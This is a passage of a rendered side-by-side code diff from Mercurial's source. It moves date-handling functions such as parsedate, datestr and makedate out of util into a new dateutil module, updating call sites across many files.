2330 |
|
2331 | |||
2331 | if len(old.parents()) > 1: |
|
2332 | if len(old.parents()) > 1: | |
2332 | # ctx.files() isn't reliable for merges, so fall back to the |
|
2333 | # ctx.files() isn't reliable for merges, so fall back to the |
@@ -61,6 +61,7 b' from . import (' | |||||
61 | util, |
|
61 | util, | |
62 | wireprotoserver, |
|
62 | wireprotoserver, | |
63 | ) |
|
63 | ) | |
|
64 | from .utils import dateutil | |||
64 |
|
65 | |||
65 | release = lockmod.release |
|
66 | release = lockmod.release | |
66 |
|
67 | |||
@@ -302,9 +303,9 b' def annotate(ui, repo, *pats, **opts):' | |||||
302 |
|
303 | |||
303 | rootfm = ui.formatter('annotate', opts) |
|
304 | rootfm = ui.formatter('annotate', opts) | |
304 | if ui.quiet: |
|
305 | if ui.quiet: | |
305 | datefunc = util.shortdate |
|
306 | datefunc = dateutil.shortdate | |
306 | else: |
|
307 | else: | |
307 | datefunc = util.datestr |
|
308 | datefunc = dateutil.datestr | |
308 | if ctx.rev() is None: |
|
309 | if ctx.rev() is None: | |
309 | def hexfn(node): |
|
310 | def hexfn(node): | |
310 | if node is None: |
|
311 | if node is None: | |
@@ -584,7 +585,7 b' def _dobackout(ui, repo, node=None, rev=' | |||||
584 |
|
585 | |||
585 | date = opts.get('date') |
|
586 | date = opts.get('date') | |
586 | if date: |
|
587 | if date: | |
587 | opts['date'] = util.parsedate(date) |
|
588 | opts['date'] = dateutil.parsedate(date) | |
588 |
|
589 | |||
589 | cmdutil.checkunfinished(repo) |
|
590 | cmdutil.checkunfinished(repo) | |
590 | cmdutil.bailifchanged(repo) |
|
591 | cmdutil.bailifchanged(repo) | |
@@ -2161,7 +2162,7 b' def _dograft(ui, repo, *revs, **opts):' | |||||
2161 | if not opts.get('user') and opts.get('currentuser'): |
|
2162 | if not opts.get('user') and opts.get('currentuser'): | |
2162 | opts['user'] = ui.username() |
|
2163 | opts['user'] = ui.username() | |
2163 | if not opts.get('date') and opts.get('currentdate'): |
|
2164 | if not opts.get('date') and opts.get('currentdate'): | |
2164 | opts['date'] = "%d %d" % util.makedate() |
|
2165 | opts['date'] = "%d %d" % dateutil.makedate() | |
2165 |
|
2166 | |||
2166 | editor = cmdutil.getcommiteditor(editform='graft', |
|
2167 | editor = cmdutil.getcommiteditor(editform='graft', | |
2167 | **pycompat.strkwargs(opts)) |
|
2168 | **pycompat.strkwargs(opts)) | |
@@ -3011,7 +3012,7 b' def import_(ui, repo, patch1=None, *patc' | |||||
3011 |
|
3012 | |||
3012 | date = opts.get('date') |
|
3013 | date = opts.get('date') | |
3013 | if date: |
|
3014 | if date: | |
3014 | opts['date'] = util.parsedate(date) |
|
3015 | opts['date'] = dateutil.parsedate(date) | |
3015 |
|
3016 | |||
3016 | exact = opts.get('exact') |
|
3017 | exact = opts.get('exact') | |
3017 | update = not opts.get('bypass') |
|
3018 | update = not opts.get('bypass') | |
@@ -5307,7 +5308,7 b' def tag(ui, repo, name1, *names, **opts)' | |||||
5307 |
|
5308 | |||
5308 | date = opts.get('date') |
|
5309 | date = opts.get('date') | |
5309 | if date: |
|
5310 | if date: | |
5310 | date = util.parsedate(date) |
|
5311 | date = dateutil.parsedate(date) | |
5311 |
|
5312 | |||
5312 | if opts.get('remove'): |
|
5313 | if opts.get('remove'): | |
5313 | editform = 'tag.remove' |
|
5314 | editform = 'tag.remove' |
@@ -49,6 +49,7 b' from . import (' | |||||
49 | subrepoutil, |
|
49 | subrepoutil, | |
50 | util, |
|
50 | util, | |
51 | ) |
|
51 | ) | |
|
52 | from .utils import dateutil | |||
52 |
|
53 | |||
53 | propertycache = util.propertycache |
|
54 | propertycache = util.propertycache | |
54 |
|
55 | |||
@@ -1287,7 +1288,7 b' class committablectx(basectx):' | |||||
1287 | self._node = None |
|
1288 | self._node = None | |
1288 | self._text = text |
|
1289 | self._text = text | |
1289 | if date: |
|
1290 | if date: | |
1290 | self._date = util.parsedate(date) |
|
1291 | self._date = dateutil.parsedate(date) | |
1291 | if user: |
|
1292 | if user: | |
1292 | self._user = user |
|
1293 | self._user = user | |
1293 | if changes: |
|
1294 | if changes: | |
@@ -1364,7 +1365,7 b' class committablectx(basectx):' | |||||
1364 | ui = self._repo.ui |
|
1365 | ui = self._repo.ui | |
1365 | date = ui.configdate('devel', 'default-date') |
|
1366 | date = ui.configdate('devel', 'default-date') | |
1366 | if date is None: |
|
1367 | if date is None: | |
1367 | date = util.makedate() |
|
1368 | date = dateutil.makedate() | |
1368 | return date |
|
1369 | return date | |
1369 |
|
1370 | |||
1370 | def subrev(self, subpath): |
|
1371 | def subrev(self, subpath): | |
@@ -2111,11 +2112,11 b' class overlayworkingctx(committablectx):' | |||||
2111 | if data is None: |
|
2112 | if data is None: | |
2112 | raise error.ProgrammingError("data must be non-None") |
|
2113 | raise error.ProgrammingError("data must be non-None") | |
2113 | self._auditconflicts(path) |
|
2114 | self._auditconflicts(path) | |
2114 | self._markdirty(path, exists=True, data=data, date=util.makedate(), |
|
2115 | self._markdirty(path, exists=True, data=data, date=dateutil.makedate(), | |
2115 | flags=flags) |
|
2116 | flags=flags) | |
2116 |
|
2117 | |||
2117 | def setflags(self, path, l, x): |
|
2118 | def setflags(self, path, l, x): | |
2118 | self._markdirty(path, exists=True, date=util.makedate(), |
|
2119 | self._markdirty(path, exists=True, date=dateutil.makedate(), | |
2119 | flags=(l and 'l' or '') + (x and 'x' or '')) |
|
2120 | flags=(l and 'l' or '') + (x and 'x' or '')) | |
2120 |
|
2121 | |||
2121 | def remove(self, path): |
|
2122 | def remove(self, path): | |
@@ -2404,7 +2405,7 b' class memctx(committablectx):' | |||||
2404 |
|
2405 | |||
2405 | user receives the committer name and defaults to current |
|
2406 | user receives the committer name and defaults to current | |
2406 | repository username, date is the commit date in any format |
|
2407 | repository username, date is the commit date in any format | |
2407 | supported by util.parsedate() and defaults to current date, extra |
|
2408 | supported by dateutil.parsedate() and defaults to current date, extra | |
2408 | is a dictionary of metadata or is left empty. |
|
2409 | is a dictionary of metadata or is left empty. | |
2409 | """ |
|
2410 | """ | |
2410 |
|
2411 | |||
@@ -2619,7 +2620,7 b' class metadataonlyctx(committablectx):' | |||||
2619 |
|
2620 | |||
2620 | user receives the committer name and defaults to current repository |
|
2621 | user receives the committer name and defaults to current repository | |
2621 | username, date is the commit date in any format supported by |
|
2622 | username, date is the commit date in any format supported by | |
2622 | util.parsedate() and defaults to current date, extra is a dictionary of |
|
2623 | dateutil.parsedate() and defaults to current date, extra is a dictionary of | |
2623 | metadata or is left empty. |
|
2624 | metadata or is left empty. | |
2624 | """ |
|
2625 | """ | |
2625 | def __new__(cls, repo, originalctx, *args, **kwargs): |
|
2626 | def __new__(cls, repo, originalctx, *args, **kwargs): |
@@ -77,6 +77,7 b' from . import (' | |||||
77 | vfs as vfsmod, |
|
77 | vfs as vfsmod, | |
78 | wireprotoserver, |
|
78 | wireprotoserver, | |
79 | ) |
|
79 | ) | |
|
80 | from .utils import dateutil | |||
80 |
|
81 | |||
81 | release = lockmod.release |
|
82 | release = lockmod.release | |
82 |
|
83 | |||
@@ -560,13 +561,13 b' def debugdata(ui, repo, file_, rev=None,' | |||||
560 | def debugdate(ui, date, range=None, **opts): |
|
561 | def debugdate(ui, date, range=None, **opts): | |
561 | """parse and display a date""" |
|
562 | """parse and display a date""" | |
562 | if opts[r"extended"]: |
|
563 | if opts[r"extended"]: | |
563 | d = util.parsedate(date, util.extendeddateformats) |
|
564 | d = dateutil.parsedate(date, util.extendeddateformats) | |
564 | else: |
|
565 | else: | |
565 | d = util.parsedate(date) |
|
566 | d = dateutil.parsedate(date) | |
566 | ui.write(("internal: %d %d\n") % d) |
|
567 | ui.write(("internal: %d %d\n") % d) | |
567 | ui.write(("standard: %s\n") % util.datestr(d)) |
|
568 | ui.write(("standard: %s\n") % dateutil.datestr(d)) | |
568 | if range: |
|
569 | if range: | |
569 | m = util.matchdate(range) |
|
570 | m = dateutil.matchdate(range) | |
570 | ui.write(("match: %s\n") % m(d[0])) |
|
571 | ui.write(("match: %s\n") % m(d[0])) | |
571 |
|
572 | |||
572 | @command('debugdeltachain', |
|
573 | @command('debugdeltachain', | |
@@ -1578,7 +1579,7 b' def debugobsolete(ui, repo, precursor=No' | |||||
1578 | try: |
|
1579 | try: | |
1579 | date = opts.get('date') |
|
1580 | date = opts.get('date') | |
1580 | if date: |
|
1581 | if date: | |
1581 | date = util.parsedate(date) |
|
1582 | date = dateutil.parsedate(date) | |
1582 | else: |
|
1583 | else: | |
1583 | date = None |
|
1584 | date = None | |
1584 | prec = parsenodeid(precursor) |
|
1585 | prec = parsenodeid(precursor) |
@@ -126,6 +126,7 b' from . import (' | |||||
126 | templater, |
|
126 | templater, | |
127 | util, |
|
127 | util, | |
128 | ) |
|
128 | ) | |
|
129 | from .utils import dateutil | |||
129 |
|
130 | |||
130 | pickle = util.pickle |
|
131 | pickle = util.pickle | |
131 |
|
132 | |||
@@ -243,7 +244,7 b' class _plainconverter(object):' | |||||
243 | @staticmethod |
|
244 | @staticmethod | |
244 | def formatdate(date, fmt): |
|
245 | def formatdate(date, fmt): | |
245 | '''stringify date tuple in the given format''' |
|
246 | '''stringify date tuple in the given format''' | |
246 | return util.datestr(date, fmt) |
|
247 | return dateutil.datestr(date, fmt) | |
247 | @staticmethod |
|
248 | @staticmethod | |
248 | def formatdict(data, key, value, fmt, sep): |
|
249 | def formatdict(data, key, value, fmt, sep): | |
249 | '''stringify key-value pairs separated by sep''' |
|
250 | '''stringify key-value pairs separated by sep''' |
@@ -46,6 +46,7 b' from . import (' | |||||
46 | webutil, |
|
46 | webutil, | |
47 | wsgicgi, |
|
47 | wsgicgi, | |
48 | ) |
|
48 | ) | |
|
49 | from ..utils import dateutil | |||
49 |
|
50 | |||
50 | def cleannames(items): |
|
51 | def cleannames(items): | |
51 | return [(util.pconvert(name).strip('/'), path) for name, path in items] |
|
52 | return [(util.pconvert(name).strip('/'), path) for name, path in items] | |
@@ -376,7 +377,7 b' class hgwebdir(object):' | |||||
376 | if directory: |
|
377 | if directory: | |
377 | # get the directory's time information |
|
378 | # get the directory's time information | |
378 | try: |
|
379 | try: | |
379 | d = (get_mtime(path), util.makedate()[1]) |
|
380 | d = (get_mtime(path), dateutil.makedate()[1]) | |
380 | except OSError: |
|
381 | except OSError: | |
381 | continue |
|
382 | continue | |
382 |
|
383 | |||
@@ -425,7 +426,7 b' class hgwebdir(object):' | |||||
425 | u.warn(_('error accessing repository at %s\n') % path) |
|
426 | u.warn(_('error accessing repository at %s\n') % path) | |
426 | continue |
|
427 | continue | |
427 | try: |
|
428 | try: | |
428 | d = (get_mtime(r.spath), util.makedate()[1]) |
|
429 | d = (get_mtime(r.spath), dateutil.makedate()[1]) | |
429 | except OSError: |
|
430 | except OSError: | |
430 | continue |
|
431 | continue | |
431 |
|
432 |
@@ -35,6 +35,7 b' from . import (' | |||||
35 | templater, |
|
35 | templater, | |
36 | util, |
|
36 | util, | |
37 | ) |
|
37 | ) | |
|
38 | from .utils import dateutil | |||
38 |
|
39 | |||
39 | def getlimit(opts): |
|
40 | def getlimit(opts): | |
40 | """get the log limit according to option -l/--limit""" |
|
41 | """get the log limit according to option -l/--limit""" | |
@@ -229,7 +230,7 b' class changesetprinter(object):' | |||||
229 | % scmutil.formatrevnode(self.ui, mrev, mnode), |
|
230 | % scmutil.formatrevnode(self.ui, mrev, mnode), | |
230 | label='ui.debug log.manifest') |
|
231 | label='ui.debug log.manifest') | |
231 | self.ui.write(columns['user'] % ctx.user(), label='log.user') |
|
232 | self.ui.write(columns['user'] % ctx.user(), label='log.user') | |
232 | self.ui.write(columns['date'] % util.datestr(ctx.date()), |
|
233 | self.ui.write(columns['date'] % dateutil.datestr(ctx.date()), | |
233 | label='log.date') |
|
234 | label='log.date') | |
234 |
|
235 | |||
235 | if ctx.isunstable(): |
|
236 | if ctx.isunstable(): |
@@ -19,6 +19,7 b' from . import (' | |||||
19 | pycompat, |
|
19 | pycompat, | |
20 | util, |
|
20 | util, | |
21 | ) |
|
21 | ) | |
|
22 | from .utils import dateutil | |||
22 |
|
23 | |||
23 | _missing_newline_marker = "\\ No newline at end of file\n" |
|
24 | _missing_newline_marker = "\\ No newline at end of file\n" | |
24 |
|
25 | |||
@@ -255,7 +256,7 b' def unidiff(a, ad, b, bd, fn1, fn2, bina' | |||||
255 | aprefix = 'a/' |
|
256 | aprefix = 'a/' | |
256 | bprefix = 'b/' |
|
257 | bprefix = 'b/' | |
257 |
|
258 | |||
258 | epoch = util.datestr((0, 0)) |
|
259 | epoch = dateutil.datestr((0, 0)) | |
259 |
|
260 | |||
260 | fn1 = util.pconvert(fn1) |
|
261 | fn1 = util.pconvert(fn1) | |
261 | fn2 = util.pconvert(fn2) |
|
262 | fn2 = util.pconvert(fn2) |
@@ -81,6 +81,7 b' from . import (' | |||||
81 | policy, |
|
81 | policy, | |
82 | util, |
|
82 | util, | |
83 | ) |
|
83 | ) | |
|
84 | from .utils import dateutil | |||
84 |
|
85 | |||
85 | parsers = policy.importmod(r'parsers') |
|
86 | parsers = policy.importmod(r'parsers') | |
86 |
|
87 | |||
@@ -601,13 +602,13 b' class obsstore(object):' | |||||
601 | if date is None: |
|
602 | if date is None: | |
602 | if 'date' in metadata: |
|
603 | if 'date' in metadata: | |
603 | # as a courtesy for out-of-tree extensions |
|
604 | # as a courtesy for out-of-tree extensions | |
604 | date = util.parsedate(metadata.pop('date')) |
|
605 | date = dateutil.parsedate(metadata.pop('date')) | |
605 | elif ui is not None: |
|
606 | elif ui is not None: | |
606 | date = ui.configdate('devel', 'default-date') |
|
607 | date = ui.configdate('devel', 'default-date') | |
607 | if date is None: |
|
608 | if date is None: | |
608 | date = util.makedate() |
|
609 | date = dateutil.makedate() | |
609 | else: |
|
610 | else: | |
610 | date = util.makedate() |
|
611 | date = dateutil.makedate() | |
611 | if len(prec) != 20: |
|
612 | if len(prec) != 20: | |
612 | raise ValueError(prec) |
|
613 | raise ValueError(prec) | |
613 | for succ in succs: |
|
614 | for succ in succs: |
@@ -15,6 +15,7 b' from . import (' | |||||
15 | phases, |
|
15 | phases, | |
16 | util, |
|
16 | util, | |
17 | ) |
|
17 | ) | |
|
18 | from .utils import dateutil | |||
18 |
|
19 | |||
19 | class marker(object): |
|
20 | class marker(object): | |
20 | """Wrap obsolete marker raw data""" |
|
21 | """Wrap obsolete marker raw data""" | |
@@ -841,11 +842,11 b' def obsfateprinter(successors, markers, ' | |||||
841 | max_date = max(dates) |
|
842 | max_date = max(dates) | |
842 |
|
843 | |||
843 | if min_date == max_date: |
|
844 | if min_date == max_date: | |
844 | fmtmin_date = util.datestr(min_date, '%Y-%m-%d %H:%M %1%2') |
|
845 | fmtmin_date = dateutil.datestr(min_date, '%Y-%m-%d %H:%M %1%2') | |
845 | line.append(" (at %s)" % fmtmin_date) |
|
846 | line.append(" (at %s)" % fmtmin_date) | |
846 | else: |
|
847 | else: | |
847 | fmtmin_date = util.datestr(min_date, '%Y-%m-%d %H:%M %1%2') |
|
848 | fmtmin_date = dateutil.datestr(min_date, '%Y-%m-%d %H:%M %1%2') | |
848 | fmtmax_date = util.datestr(max_date, '%Y-%m-%d %H:%M %1%2') |
|
849 | fmtmax_date = dateutil.datestr(max_date, '%Y-%m-%d %H:%M %1%2') | |
849 | line.append(" (between %s and %s)" % (fmtmin_date, fmtmax_date)) |
|
850 | line.append(" (between %s and %s)" % (fmtmin_date, fmtmax_date)) | |
850 |
|
851 | |||
851 | return "".join(line) |
|
852 | return "".join(line) |
@@ -40,6 +40,7 b' from . import (' | |||||
40 | util, |
|
40 | util, | |
41 | vfs as vfsmod, |
|
41 | vfs as vfsmod, | |
42 | ) |
|
42 | ) | |
|
43 | from .utils import dateutil | |||
43 |
|
44 | |||
44 | diffhelpers = policy.importmod(r'diffhelpers') |
|
45 | diffhelpers = policy.importmod(r'diffhelpers') | |
45 | stringio = util.stringio |
|
46 | stringio = util.stringio | |
@@ -2669,8 +2670,8 b' def trydiff(repo, revs, ctx1, ctx2, modi' | |||||
2669 | def isempty(fctx): |
|
2670 | def isempty(fctx): | |
2670 | return fctx is None or fctx.size() == 0 |
|
2671 | return fctx is None or fctx.size() == 0 | |
2671 |
|
2672 | |||
2672 | date1 = util.datestr(ctx1.date()) |
|
2673 | date1 = dateutil.datestr(ctx1.date()) | |
2673 | date2 = util.datestr(ctx2.date()) |
|
2674 | date2 = dateutil.datestr(ctx2.date()) | |
2674 |
|
2675 | |||
2675 | gitmode = {'l': '120000', 'x': '100755', '': '100644'} |
|
2676 | gitmode = {'l': '120000', 'x': '100755', '': '100644'} | |
2676 |
|
2677 |
@@ -30,6 +30,7 b' from . import (' | |||||
30 | smartset, |
|
30 | smartset, | |
31 | util, |
|
31 | util, | |
32 | ) |
|
32 | ) | |
|
33 | from .utils import dateutil | |||
33 |
|
34 | |||
34 | # helpers for processing parsed tree |
|
35 | # helpers for processing parsed tree | |
35 | getsymbol = revsetlang.getsymbol |
|
36 | getsymbol = revsetlang.getsymbol | |
@@ -658,7 +659,7 b' def date(repo, subset, x):' | |||||
658 | """ |
|
659 | """ | |
659 | # i18n: "date" is a keyword |
|
660 | # i18n: "date" is a keyword | |
660 | ds = getstring(x, _("date requires a string")) |
|
661 | ds = getstring(x, _("date requires a string")) | |
661 | dm = util.matchdate(ds) |
|
662 | dm = dateutil.matchdate(ds) | |
662 | return subset.filter(lambda x: dm(repo[x].date()[0]), |
|
663 | return subset.filter(lambda x: dm(repo[x].date()[0]), | |
663 | condrepr=('<date %r>', ds)) |
|
664 | condrepr=('<date %r>', ds)) | |
664 |
|
665 |
@@ -36,6 +36,7 b' from . import (' | |||||
36 | util, |
|
36 | util, | |
37 | vfs as vfsmod, |
|
37 | vfs as vfsmod, | |
38 | ) |
|
38 | ) | |
|
39 | from .utils import dateutil | |||
39 |
|
40 | |||
40 | hg = None |
|
41 | hg = None | |
41 | reporelpath = subrepoutil.reporelpath |
|
42 | reporelpath = subrepoutil.reporelpath | |
@@ -1467,7 +1468,7 b' class gitsubrepo(abstractsubrepo):' | |||||
1467 | if date: |
|
1468 | if date: | |
1468 | # git's date parser silently ignores when seconds < 1e9 |
|
1469 | # git's date parser silently ignores when seconds < 1e9 | |
1469 | # convert to ISO8601 |
|
1470 | # convert to ISO8601 | |
1470 | env['GIT_AUTHOR_DATE'] = util.datestr(date, |
|
1471 | env['GIT_AUTHOR_DATE'] = dateutil.datestr(date, | |
1471 | '%Y-%m-%dT%H:%M:%S %1%2') |
|
1472 | '%Y-%m-%dT%H:%M:%S %1%2') | |
1472 | self._gitcommand(cmd, env=env) |
|
1473 | self._gitcommand(cmd, env=env) | |
1473 | # make sure commit works otherwise HEAD might not exist under certain |
|
1474 | # make sure commit works otherwise HEAD might not exist under certain |
@@ -22,6 +22,7 b' from . import (' | |||||
22 | url, |
|
22 | url, | |
23 | util, |
|
23 | util, | |
24 | ) |
|
24 | ) | |
|
25 | from .utils import dateutil | |||
25 |
|
26 | |||
26 | urlerr = util.urlerr |
|
27 | urlerr = util.urlerr | |
27 | urlreq = util.urlreq |
|
28 | urlreq = util.urlreq | |
@@ -78,7 +79,7 b' def age(date, abbrev=False):' | |||||
78 | else: |
|
79 | else: | |
79 | delta = max(1, int(now - then)) |
|
80 | delta = max(1, int(now - then)) | |
80 | if delta > agescales[0][1] * 2: |
|
81 | if delta > agescales[0][1] * 2: | |
81 | return util.shortdate(date) |
|
82 | return dateutil.shortdate(date) | |
82 |
|
83 | |||
83 | for t, s, a in agescales: |
|
84 | for t, s, a in agescales: | |
84 | n = delta // s |
|
85 | n = delta // s | |
@@ -203,7 +204,7 b' def isodate(text):' | |||||
203 | """Date. Returns the date in ISO 8601 format: "2009-08-18 13:00 |
|
204 | """Date. Returns the date in ISO 8601 format: "2009-08-18 13:00 | |
204 | +0200". |
|
205 | +0200". | |
205 | """ |
|
206 | """ | |
206 | return util.datestr(text, '%Y-%m-%d %H:%M %1%2') |
|
207 | return dateutil.datestr(text, '%Y-%m-%d %H:%M %1%2') | |
207 |
|
208 | |||
208 | @templatefilter('isodatesec') |
|
209 | @templatefilter('isodatesec') | |
209 | def isodatesec(text): |
|
210 | def isodatesec(text): | |
@@ -211,7 +212,7 b' def isodatesec(text):' | |||||
211 | seconds: "2009-08-18 13:00:13 +0200". See also the rfc3339date |
|
212 | seconds: "2009-08-18 13:00:13 +0200". See also the rfc3339date | |
212 | filter. |
|
213 | filter. | |
213 | """ |
|
214 | """ | |
214 | return util.datestr(text, '%Y-%m-%d %H:%M:%S %1%2') |
|
215 | return dateutil.datestr(text, '%Y-%m-%d %H:%M:%S %1%2') | |
215 |
|
216 | |||
216 | def indent(text, prefix): |
|
217 | def indent(text, prefix): | |
217 | '''indent each non-empty line of text after first with prefix.''' |
|
218 | '''indent each non-empty line of text after first with prefix.''' | |
@@ -325,14 +326,14 b' def rfc3339date(text):' | |||||
325 | """Date. Returns a date using the Internet date format |
|
326 | """Date. Returns a date using the Internet date format | |
326 | specified in RFC 3339: "2009-08-18T13:00:13+02:00". |
|
327 | specified in RFC 3339: "2009-08-18T13:00:13+02:00". | |
327 | """ |
|
328 | """ | |
328 | return util.datestr(text, "%Y-%m-%dT%H:%M:%S%1:%2") |
|
329 | return dateutil.datestr(text, "%Y-%m-%dT%H:%M:%S%1:%2") | |
329 |
|
330 | |||
330 | @templatefilter('rfc822date') |
|
331 | @templatefilter('rfc822date') | |
331 | def rfc822date(text): |
|
332 | def rfc822date(text): | |
332 | """Date. Returns a date using the same format used in email |
|
333 | """Date. Returns a date using the same format used in email | |
333 | headers: "Tue, 18 Aug 2009 13:00:13 +0200". |
|
334 | headers: "Tue, 18 Aug 2009 13:00:13 +0200". | |
334 | """ |
|
335 | """ | |
335 | return util.datestr(text, "%a, %d %b %Y %H:%M:%S %1%2") |
|
336 | return dateutil.datestr(text, "%a, %d %b %Y %H:%M:%S %1%2") | |
336 |
|
337 | |||
337 | @templatefilter('short') |
|
338 | @templatefilter('short') | |
338 | def short(text): |
|
339 | def short(text): | |
@@ -353,7 +354,7 b' def shortbisect(text):' | |||||
353 | @templatefilter('shortdate') |
|
354 | @templatefilter('shortdate') | |
354 | def shortdate(text): |
|
355 | def shortdate(text): | |
355 | """Date. Returns a date like "2006-09-18".""" |
|
356 | """Date. Returns a date like "2006-09-18".""" | |
356 | return util.shortdate(text) |
|
357 | return dateutil.shortdate(text) | |
357 |
|
358 | |||
358 | @templatefilter('slashpath') |
|
359 | @templatefilter('slashpath') | |
359 | def slashpath(path): |
|
360 | def slashpath(path): |
@@ -29,6 +29,7 b' from . import (' | |||||
29 | templatekw, |
|
29 | templatekw, | |
30 | util, |
|
30 | util, | |
31 | ) |
|
31 | ) | |
|
32 | from .utils import dateutil | |||
32 |
|
33 | |||
33 | class ResourceUnavailable(error.Abort): |
|
34 | class ResourceUnavailable(error.Abort): | |
34 | pass |
|
35 | pass | |
@@ -649,9 +650,9 b' def date(context, mapping, args):' | |||||
649 | fmt = evalstring(context, mapping, args[1]) |
|
650 | fmt = evalstring(context, mapping, args[1]) | |
650 | try: |
|
651 | try: | |
651 | if fmt is None: |
|
652 | if fmt is None: | |
652 | return util.datestr(date) |
|
653 | return dateutil.datestr(date) | |
653 | else: |
|
654 | else: | |
654 | return util.datestr(date, fmt) |
|
655 | return dateutil.datestr(date, fmt) | |
655 | except (TypeError, ValueError): |
|
656 | except (TypeError, ValueError): | |
656 | # i18n: "date" is a keyword |
|
657 | # i18n: "date" is a keyword | |
657 | raise error.ParseError(_("date expects a date information")) |
|
658 | raise error.ParseError(_("date expects a date information")) | |
@@ -954,7 +955,7 b' def localdate(context, mapping, args):' | |||||
954 |
|
955 | |||
955 | date = evalfuncarg(context, mapping, args[0]) |
|
956 | date = evalfuncarg(context, mapping, args[0]) | |
956 | try: |
|
957 | try: | |
957 | date = util.parsedate(date) |
|
958 | date = dateutil.parsedate(date) | |
958 | except AttributeError: # not str nor date tuple |
|
959 | except AttributeError: # not str nor date tuple | |
959 | # i18n: "localdate" is a keyword |
|
960 | # i18n: "localdate" is a keyword | |
960 | raise error.ParseError(_("localdate expects a date information")) |
|
961 | raise error.ParseError(_("localdate expects a date information")) | |
@@ -962,7 +963,7 b' def localdate(context, mapping, args):' | |||||
962 | tzoffset = None |
|
963 | tzoffset = None | |
963 | tz = evalfuncarg(context, mapping, args[1]) |
|
964 | tz = evalfuncarg(context, mapping, args[1]) | |
964 | if isinstance(tz, bytes): |
|
965 | if isinstance(tz, bytes): | |
965 | tzoffset, remainder = util.parsetimezone(tz) |
|
966 | tzoffset, remainder = dateutil.parsetimezone(tz) | |
966 | if remainder: |
|
967 | if remainder: | |
967 | tzoffset = None |
|
968 | tzoffset = None | |
968 | if tzoffset is None: |
|
969 | if tzoffset is None: | |
@@ -972,7 +973,7 b' def localdate(context, mapping, args):' | |||||
972 | # i18n: "localdate" is a keyword |
|
973 | # i18n: "localdate" is a keyword | |
973 | raise error.ParseError(_("localdate expects a timezone")) |
|
974 | raise error.ParseError(_("localdate expects a timezone")) | |
974 | else: |
|
975 | else: | |
975 | tzoffset = util.makedate()[1] |
|
976 | tzoffset = dateutil.makedate()[1] | |
976 | return (date[0], tzoffset) |
|
977 | return (date[0], tzoffset) | |
977 |
|
978 | |||
978 | @templatefunc('max(iterable)') |
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979 | @templatefunc('max(iterable)') |
@@ -37,6 +37,7 b' from . import (' | |||||
37 | scmutil, |
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37 | scmutil, | |
38 | util, |
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38 | util, | |
39 | ) |
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39 | ) | |
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40 | from .utils import dateutil | |||
40 |
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41 | |||
41 | urlreq = util.urlreq |
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42 | urlreq = util.urlreq | |
42 |
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43 | |||
@@ -714,7 +715,7 b' class ui(object):' | |||||
714 | (0, 0) |
|
715 | (0, 0) | |
715 | """ |
|
716 | """ | |
716 | if self.config(section, name, default, untrusted): |
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717 | if self.config(section, name, default, untrusted): | |
717 | return self.configwith(util.parsedate, section, name, default, |
|
718 | return self.configwith(dateutil.parsedate, section, name, default, | |
718 | 'date', untrusted) |
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719 | 'date', untrusted) | |
719 | if default is _unset: |
|
720 | if default is _unset: | |
720 | return None |
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721 | return None |
@@ -17,11 +17,9 b' from __future__ import absolute_import, ' | |||||
17 |
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17 | |||
18 | import abc |
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18 | import abc | |
19 | import bz2 |
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19 | import bz2 | |
20 | import calendar |
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21 | import codecs |
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20 | import codecs | |
22 | import collections |
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21 | import collections | |
23 | import contextlib |
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22 | import contextlib | |
24 | import datetime |
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25 | import errno |
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23 | import errno | |
26 | import gc |
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24 | import gc | |
27 | import hashlib |
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25 | import hashlib | |
@@ -55,6 +53,7 b' from . import (' | |||||
55 | pycompat, |
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53 | pycompat, | |
56 | urllibcompat, |
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54 | urllibcompat, | |
57 | ) |
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55 | ) | |
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56 | from .utils import dateutil | |||
58 |
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57 | |||
59 | base85 = policy.importmod(r'base85') |
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58 | base85 = policy.importmod(r'base85') | |
60 | osutil = policy.importmod(r'osutil') |
|
59 | osutil = policy.importmod(r'osutil') | |
@@ -855,48 +854,6 b' def versiontuple(v=None, n=4):' | |||||
855 | if n == 4: |
|
854 | if n == 4: | |
856 | return (vints[0], vints[1], vints[2], extra) |
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855 | return (vints[0], vints[1], vints[2], extra) | |
857 |
|
856 | |||
858 | # used by parsedate |
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|||
859 | defaultdateformats = ( |
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860 | '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601 |
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861 | '%Y-%m-%dT%H:%M', # without seconds |
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|||
862 | '%Y-%m-%dT%H%M%S', # another awful but legal variant without : |
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863 | '%Y-%m-%dT%H%M', # without seconds |
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864 | '%Y-%m-%d %H:%M:%S', # our common legal variant |
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|||
865 | '%Y-%m-%d %H:%M', # without seconds |
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|||
866 | '%Y-%m-%d %H%M%S', # without : |
|
|||
867 | '%Y-%m-%d %H%M', # without seconds |
|
|||
868 | '%Y-%m-%d %I:%M:%S%p', |
|
|||
869 | '%Y-%m-%d %H:%M', |
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|||
870 | '%Y-%m-%d %I:%M%p', |
|
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871 | '%Y-%m-%d', |
|
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872 | '%m-%d', |
|
|||
873 | '%m/%d', |
|
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874 | '%m/%d/%y', |
|
|||
875 | '%m/%d/%Y', |
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876 | '%a %b %d %H:%M:%S %Y', |
|
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877 | '%a %b %d %I:%M:%S%p %Y', |
|
|||
878 | '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822" |
|
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879 | '%b %d %H:%M:%S %Y', |
|
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880 | '%b %d %I:%M:%S%p %Y', |
|
|||
881 | '%b %d %H:%M:%S', |
|
|||
882 | '%b %d %I:%M:%S%p', |
|
|||
883 | '%b %d %H:%M', |
|
|||
884 | '%b %d %I:%M%p', |
|
|||
885 | '%b %d %Y', |
|
|||
886 | '%b %d', |
|
|||
887 | '%H:%M:%S', |
|
|||
888 | '%I:%M:%S%p', |
|
|||
889 | '%H:%M', |
|
|||
890 | '%I:%M%p', |
|
|||
891 | ) |
|
|||
892 |
|
||||
893 | extendeddateformats = defaultdateformats + ( |
|
|||
894 | "%Y", |
|
|||
895 | "%Y-%m", |
|
|||
896 | "%b", |
|
|||
897 | "%b %Y", |
|
|||
898 | ) |
|
|||
899 |
|
||||
900 | def cachefunc(func): |
|
857 | def cachefunc(func): | |
901 | '''cache the result of function calls''' |
|
858 | '''cache the result of function calls''' | |
902 | # XXX doesn't handle keywords args |
|
859 | # XXX doesn't handle keywords args | |
@@ -2304,277 +2261,6 b' class cappedreader(object):' | |||||
2304 |
|
2261 | |||
2305 | return data |
|
2262 | return data | |
2306 |
|
2263 | |||
2307 | def makedate(timestamp=None): |
|
|||
2308 | '''Return a unix timestamp (or the current time) as a (unixtime, |
|
|||
2309 | offset) tuple based off the local timezone.''' |
|
|||
2310 | if timestamp is None: |
|
|||
